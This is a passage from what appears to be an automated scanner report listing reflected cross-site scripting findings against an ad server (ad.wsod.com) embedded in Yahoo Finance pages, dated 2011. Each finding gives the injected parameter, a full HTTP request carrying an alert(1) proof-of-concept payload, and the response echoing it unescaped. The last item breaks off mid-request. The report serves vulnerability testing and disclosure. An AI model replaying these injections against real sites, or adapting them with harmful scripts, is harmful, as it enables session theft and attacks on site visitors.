1.169. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938c2</script><script>alert(1)</script>87cf77e2ec9 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,938c2</script><script>alert(1)</script>87cf77e2ec9&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830176**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,938c2</script><script>alert(1)</script>87cf77e2ec9&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/
...[SNIP]...

1.170. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81b39'-alert(1)-'9625dc88b7b was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews%3B_ylt%3DAg9ozvEv79CyQnz4pgKYSfO7YWsA%3B_ylu%3DX3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*81b39'-alert(1)-'9625dc88b7b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:38:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:38:29 GMT; path=/
Set-Cookie: i_1=46:477:988:45:0:38107:1300829909:B2|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2; expires=Thu, 21-Apr-2011 21:38:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*81b39'-alert(1)-'9625dc88b7bhttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.988.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews;_ylt=Ag9ozvEv79Cy
...[SNIP]...

1.171. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8486'-alert(1)-'f5bceba6f79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews%3B_ylt%3DAg9ozvEv79CyQnz4pgKYSfO7YWsA%3B_ylu%3DX3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&a8486'-alert(1)-'f5bceba6f79=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:40:38 GMT; path=/
Set-Cookie: i_1=46:477:986:45:0:38107:1300830038:B2|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2; expires=Thu, 21-Apr-2011 21:40:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 916

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&a8486'-alert(1)-'f5bceba6f79=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.986.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews;_ylt=Ag9ozvEv79
...[SNIP]...

1.172. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3012a'-alert(1)-'090961222b5 was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuffett-looking-at-investing-rb-757353019.html%3B_ylt%3DAveahlVQa63dPFBhs1X3QukUaq9_%3B_ylu%3DX3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--_@3Fx%3D0?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*3012a'-alert(1)-'090961222b5 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:40:41 GMT; path=/
Set-Cookie: i_1=46:477:986:45:0:38107:1300830041:B2|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2; expires=Thu, 21-Apr-2011 21:40:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 950

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*3012a'-alert(1)-'090961222b5http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.986.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuffet
...[SNIP]...

1.173. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 366e4'-alert(1)-'962128b0fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuffett-looking-at-investing-rb-757353019.html%3B_ylt%3DAveahlVQa63dPFBhs1X3QukUaq9_%3B_ylu%3DX3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--_@3Fx%3D0?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&366e4'-alert(1)-'962128b0fdb=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:41:56 GMT; path=/
Set-Cookie: i_1=46:477:987:45:0:38108:1300830116:B2|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2; expires=Thu, 21-Apr-2011 21:41:56 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 953

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&366e4'-alert(1)-'962128b0fdb=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.987.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2FBuff
...[SNIP]...

1.174. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62f15'-alert(1)-'fccbfcce1ee was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-bonds%3B_ylt%3DAjko2vz8UWQKvx78UCy.ZSkUaq9_%3B_ylu%3DX3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*62f15'-alert(1)-'fccbfcce1ee HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:41:26 GMT; path=/
Set-Cookie: i_1=46:477:988:45:0:38108:1300830086:B2|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L; expires=Thu, 21-Apr-2011 21:41:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 931

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*62f15'-alert(1)-'fccbfcce1eehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.988.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcatego
...[SNIP]...

1.175. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 929c9'-alert(1)-'99ceb1ea3fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-bonds%3B_ylt%3DAjko2vz8UWQKvx78UCy.ZSkUaq9_%3B_ylu%3DX3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&929c9'-alert(1)-'99ceb1ea3fc=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:42:24 GMT; path=/
Set-Cookie: i_1=46:477:986:45:0:38108:1300830144:B2|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L; expires=Thu, 21-Apr-2011 21:42:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 934

   function wsod_image477() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*&929c9'-alert(1)-'99ceb1ea3fc=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.986.iframe.150x30/yhdata*ycg=|yyob=|zip=,|ybt=17-89-225-226-274-8319||**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcate
...[SNIP]...

1.176. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**

Issue detail

The value of the &click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de07c'-alert(1)-'6a4bc9f3825 was submitted in the &click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fnews_@2Fcategory-legal-matters%3B_ylt%3DAvy6SeQ7msNsv0vs8J.ekvsUaq9_%3B_ylu%3DX3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*de07c'-alert(1)-'6a4bc9f3825 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*
